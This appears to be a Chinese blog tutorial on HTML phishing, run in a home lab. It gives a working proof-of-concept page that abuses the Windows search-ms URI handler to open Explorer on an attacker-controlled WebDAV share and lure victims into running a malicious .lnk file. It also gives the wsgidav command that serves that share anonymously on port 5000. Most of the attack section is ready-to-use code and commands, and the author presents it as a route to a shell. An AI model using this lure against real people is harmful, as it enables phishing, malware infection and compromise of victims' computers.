html钓鱼姿势分享
0x00 实验环境
靶场:全新的windows笔记本,kali
0x01 实验前提
(1)学习国外大佬的文章
(2)动手实战
文章一分钟,复现半小时
0x02 实验步骤



apt-get install python3-wsgidav
WSGI是什么?
WSGI,全称 Web Server Gateway Interface,或者 Python Web Server Gateway Interface ,是为 Python 语言定义的 Web 服务器和 Web 应用程序或框架之间的一种简单而通用的接口。自从 WSGI 被开发出来以后,许多其它语言中也出现了类似接口。
WebDAV 是什么?
WebDAV(Web Dub)是一种技术和功能,可以使用Web服务器进行文件共享和编辑,目前可用于许多租赁服务器计划,还有用户自己设置VPS等方法。
WebDAV类似于当前流行的Google Drive等在线存储服务,云上的多个用户可以相对安全地进行文件共享和编辑。

<html> <head> <title>search-ms</title> <script> window.location.href = 'search-ms:query=lnk&crumb=location:\\\\192.168.31.242@5000\\dec&displayname=Hello, is it me you\'re looking for?'; </script> </head> <body> <center> PoC triggering Microsoft's <b>search-ms</b> URI handler to open up Explorer previewing attacker's WebDAV contents.</br> This is to lure victims into opening malicious files which could have led to their computers infection.<br/> </center> </body> </html>
(4)开启服务:在当前路径下开启5000端口。设置认证为匿名认证:
wsgidav --port=5000 --host=0.0.0.0 --root=./ --auth=anonymous



(6)当我们去点击打开的时候。可以看到页面会显示一个1.lnk文件,因为这个文件我们没做任何处理,所以是没有图标的。


0x03 一些思考
(1)以前说上传文件不能getshell的场景,用处都不大,现在发现只是因为自己了解的知识太少了;
(2)有的电脑运行html并不能成功打开资源管理器,可能是谷歌版本太低导致;
(3)多学习外国佬的文章,会涨很多姿势。